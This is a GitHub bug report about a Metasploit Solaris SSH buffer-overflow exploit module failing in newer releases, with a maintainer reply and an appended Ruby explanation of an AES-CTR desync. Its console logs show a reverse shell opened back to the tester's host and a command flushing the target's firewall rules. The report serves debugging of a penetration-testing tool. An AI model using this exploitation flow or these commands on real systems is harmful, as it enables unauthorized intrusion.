
exploit/solaris/ssh/pam_username_bof doesn't work in Metasploit recent versions #16659

Open
frantz45 opened this issue Jun 8, 2022 · 2 comments
Labels: bug, not-stale

Comments

@frantz45

frantz45 commented Jun 8, 2022

Steps to reproduce

Use exploit/solaris/ssh/pam_username_bof with a recent version of Metasploit.

Target version (uname -a):
SunOS solaris 5.10 Generic_147148-26 i86pc i386 i86pc

Were you following a specific guide/tutorial or reading documentation?

No

Expected behavior

msf6 exploit(solaris/ssh/pam_username_bof) > run

[*] Started reverse TCP handler on 192.168.120.45:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.120.1:22      - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.120.1:22      - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
[*] Yeeting cmd/unix/reverse_zsh at 192.168.120.1:22
[*] Command shell session 1 opened (192.168.120.45:4444 -> 192.168.120.1:32867) at 2022-06-08 08:01:03 -0400

pwd
/
^C
Abort session 1? [y/N]  y

[*] 192.168.120.1 - Command shell session 1 closed.  Reason: User exit

Current behavior

msf6 exploit(solaris/ssh/pam_username_bof) > run

[+] ipf -Fi && ipf -Fo && ipf -Fa
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.135.10:22     - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.135.10:22     - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
[*] Yeeting cmd/unix/generic at 192.168.135.10:22
D, [2022-06-08T07:46:07.100094 #3176492] DEBUG -- net.ssh.transport.session[c350]: establishing connection to 192.168.135.10:22 through proxy
D, [2022-06-08T07:46:08.524051 #3176492] DEBUG -- net.ssh.transport.session[c350]: connection established
I, [2022-06-08T07:46:08.524678 #3176492]  INFO -- net.ssh.transport.server_version[c364]: negotiating protocol version
D, [2022-06-08T07:46:08.524787 #3176492] DEBUG -- net.ssh.transport.server_version[c364]: local is `SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3'
D, [2022-06-08T07:46:08.948778 #3176492] DEBUG -- net.ssh.transport.server_version[c364]: remote is `SSH-2.0-Sun_SSH_1.1.5'
I, [2022-06-08T07:46:08.949931 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: sending KEXINIT
D, [2022-06-08T07:46:08.950417 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 0 type 20 len 1380
D, [2022-06-08T07:46:08.950597 #3176492] DEBUG -- tcpsocket[c38c]: sent 1384 bytes
D, [2022-06-08T07:46:10.456663 #3176492] DEBUG -- tcpsocket[c38c]: read 528 bytes
D, [2022-06-08T07:46:10.457102 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 0 type 20 len 524
I, [2022-06-08T07:46:10.457242 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: got KEXINIT from server
I, [2022-06-08T07:46:10.457449 #3176492]  INFO -- net.ssh.transport.algorithms[c378]: negotiating algorithms
D, [2022-06-08T07:46:10.457682 #3176492] DEBUG -- net.ssh.transport.algorithms[c378]: negotiated:
* kex: diffie-hellman-group14-sha1
* host_key: ssh-rsa
* encryption_server: aes256-ctr
* encryption_client: aes256-ctr
* hmac_client: hmac-sha1
* hmac_server: hmac-sha1
* compression_client: none
* compression_server: none
* language_client: 
* language_server: 
D, [2022-06-08T07:46:10.457754 #3176492] DEBUG -- net.ssh.transport.algorithms[c378]: exchanging keys
D, [2022-06-08T07:46:10.472216 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 1 type 30 len 268
D, [2022-06-08T07:46:10.472378 #3176492] DEBUG -- tcpsocket[c38c]: sent 272 bytes
D, [2022-06-08T07:46:12.545391 #3176492] DEBUG -- tcpsocket[c38c]: read 592 bytes
D, [2022-06-08T07:46:12.545710 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 1 type 31 len 572
D, [2022-06-08T07:46:12.547763 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 2 type 21 len 20
D, [2022-06-08T07:46:12.547952 #3176492] DEBUG -- tcpsocket[c38c]: sent 24 bytes
D, [2022-06-08T07:46:12.548238 #3176492] DEBUG -- tcpsocket[c38c]: received packet nr 2 type 21 len 12
D, [2022-06-08T07:46:12.549461 #3176492] DEBUG -- net.ssh.authentication.session[c3a0]: beginning authentication of `'
D, [2022-06-08T07:46:12.549722 #3176492] DEBUG -- tcpsocket[c38c]: queueing packet nr 3 type 5 len 28
D, [2022-06-08T07:46:12.549838 #3176492] DEBUG -- tcpsocket[c38c]: sent 52 bytes
D, [2022-06-08T07:46:14.659223 #3176492] DEBUG -- tcpsocket[c38c]: read 68 bytes
[-] Exploit failed: Net::SSH::Exception padding error, need 3127432943 block 16
[*] Exploit completed, but no session was created.

Metasploit version

It works in v6.0.29-dev.
It doesn't work in v6.1.42-dev and in v6.2.

Additional Information

It may be linked to #16328

@frantz45 frantz45 added the bug label Jun 8, 2022
@frantz45 frantz45 changed the title exploit/solaris/ssh/pam_username_bof doesn't work in recent versions exploit/solaris/ssh/pam_username_bof doesn't work in Metasploit recent versions Jun 8, 2022
@github-actions

github-actions bot commented Jul 8, 2022

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale label Jul 8, 2022
@bcoles
Contributor

bcoles commented Jul 8, 2022

I'm guessing this is probably a legitimate bug due to recent changes to SSH libraries.

Removing stale label, but making no personal commitment to review this issue.

@bcoles bcoles added the not-stale label and removed the Stale label Jul 8, 2022
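As an added illustration of what the "padding error, need 3127432943 block 16" line in the report means (this is my code, not Metasploit's, net-ssh's, or anything posted in the thread): net-ssh decrypts only the first cipher block of an incoming SSH packet, reads the uint32 packet_length from it, and raises that exact error when packet_length + 4 is not a multiple of the cipher block size. The check below is my reconstruction of that logic from net-ssh's packet_stream.rb, not a copy of it, and the key, IV and payloads are constructed test values. A client whose AES-CTR state is one block out of step with the server reads keystream noise as the length field, which produces this symptom (a "need" value around 3.1e9 implies a packet_length far beyond the 35000-byte maximum RFC 4253 allows); the example shows the mechanism only and does not identify which library change in 6.1.x/6.2 caused the desync.

```ruby
require 'openssl'

# aes256-ctr was negotiated in the report's debug log; CTR is a stream mode,
# but SSH still frames packets in units of the underlying block size.
BLOCK_SIZE = 16

# Build an SSH binary packet (RFC 4253 section 6):
#   uint32 packet_length, byte padding_length, payload, padding
# with total length a multiple of the block size and at least 4 bytes of padding.
def build_packet(payload, block_size = BLOCK_SIZE)
  padding_length = block_size - ((payload.bytesize + 5) % block_size)
  padding_length += block_size if padding_length < 4
  body = [padding_length].pack('C') + payload + ("\x00".b * padding_length)
  [body.bytesize].pack('N') + body
end

# One AES-256-CTR stream per direction. In CTR mode the sender and receiver
# must advance their counters in lock-step; a receiver that gets ahead or
# behind decrypts to noise without any error from the cipher itself.
def ctr_stream(key, iv, direction)
  cipher = OpenSSL::Cipher.new('aes-256-ctr')
  direction == :encrypt ? cipher.encrypt : cipher.decrypt
  cipher.key = key
  cipher.iv = iv
  cipher
end

# Reconstruction (not a copy) of net-ssh's first-block sanity check:
# decrypt one block, read packet_length, and require packet_length + 4
# to be a whole number of blocks. Returns [:ok, packet_length] or
# [:padding_error, need] mirroring the message in the report.
def check_first_block(cipher, first_block, block_size = BLOCK_SIZE)
  plain = cipher.update(first_block)
  packet_length = plain.unpack1('N')
  need = packet_length + 4 - block_size
  return [:padding_error, need] unless (need % block_size).zero?
  [:ok, packet_length]
end

# Read one whole packet from the wire buffer, keeping the cipher in step.
# Returns [status, value, next_offset].
def read_packet(cipher, wire, offset, block_size = BLOCK_SIZE)
  status, value = check_first_block(cipher, wire[offset, block_size], block_size)
  return [status, value, offset] unless status == :ok
  remaining = value + 4 - block_size
  cipher.update(wire[offset + block_size, remaining]) if remaining > 0
  [:ok, value, offset + block_size + remaining]
end

def demo
  key = ("\x11" * 32).b # constructed test key, not a real session key
  iv  = ("\x22" * 16).b # constructed test IV

  # Server side: two packets encrypted back to back on one CTR stream.
  server = ctr_stream(key, iv, :encrypt)
  packets = [build_packet('2hello'.b), build_packet('3world!!'.b)]
  wire = packets.map { |p| server.update(p) }.join

  # Client in lock-step with the server: both packets parse cleanly.
  client = ctr_stream(key, iv, :decrypt)
  in_sync = []
  offset = 0
  2.times do
    status, len, offset = read_packet(client, wire, offset)
    in_sync << [status, len]
  end

  # Client whose cipher state is one block ahead (it "consumed" a block the
  # server never sent): the length field is keystream noise, and the same
  # check net-ssh performs reports it as a padding error.
  skewed = ctr_stream(key, iv, :decrypt)
  skewed.update("\x00".b * BLOCK_SIZE)
  desynced = check_first_block(skewed, wire[0, BLOCK_SIZE])

  { in_sync: in_sync, desynced: desynced }
end

if __FILE__ == $PROGRAM_NAME
  result = demo
  puts "in sync:  #{result[:in_sync].inspect}"   # [[:ok, 12], [:ok, 28]]
  puts "desynced: #{result[:desynced].inspect}"  # almost always [:padding_error, <garbage>]
end
```

The practical reading of the error for anyone triaging this issue: the cipher stream did not fail, the framing did. Something between the negotiated encryption and the point where net-ssh reads the next packet (the module's userauth hook, a changed packet count, or an unexpected extra packet) left the client's CTR counter out of step with the server's, so bisecting net-ssh/Metasploit versions around the reporter's working v6.0.29-dev is the natural next step.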